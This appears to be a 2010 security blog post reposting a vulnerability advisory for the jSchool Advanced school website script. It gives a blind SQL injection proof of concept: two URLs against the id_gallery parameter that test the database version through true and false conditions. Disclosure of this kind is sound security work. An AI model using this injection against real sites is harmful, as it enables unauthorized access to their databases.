Monday, November 22, 2010

jSchool Advanced Blind SQL Injection Vulnerability

0

School Advanced (Blind SQL Injection) Vulnerability
-----------------------------------------------------------------------
Author : Don Tukulesto (root@indonesiancoder.com)
Site : http://indonesiancoder.com
Vendor : http://jogjacamp.com
Software : jSchool Advanced (http://www.jogjacamp.com/script_4_Script_Website_Murah_Instant_Sekolah.html)
Price : Rp. 1.200.000
GMT +07:00 November 21, 2010
-----------------------------------------------------------------------

I. Demo Site
-----------------------------------------------------------------------
http://server/index.php?action=gallery.list&id_gallery=5

II. POC
-----------------------------------------------------------------------
http://server/index.php?action=gallery.list&id_gallery=5 and substring(@@version,1,1)=5 # TRUE
http://server/index.php?action=gallery.list&id_gallery=5 and substring(@@version,1,1)=4 # FALSE

0 comments:

Post a Comment

About Me

My photo
Блог за истражување и развој на информациска безбедност, кој е наменет за постирање на најнови ранливости и слабости. Founder darknessn1k0!4

 
Design by ThemeShift | Bloggerized by Lasantha - Free Blogger Templates | Best Web Hosting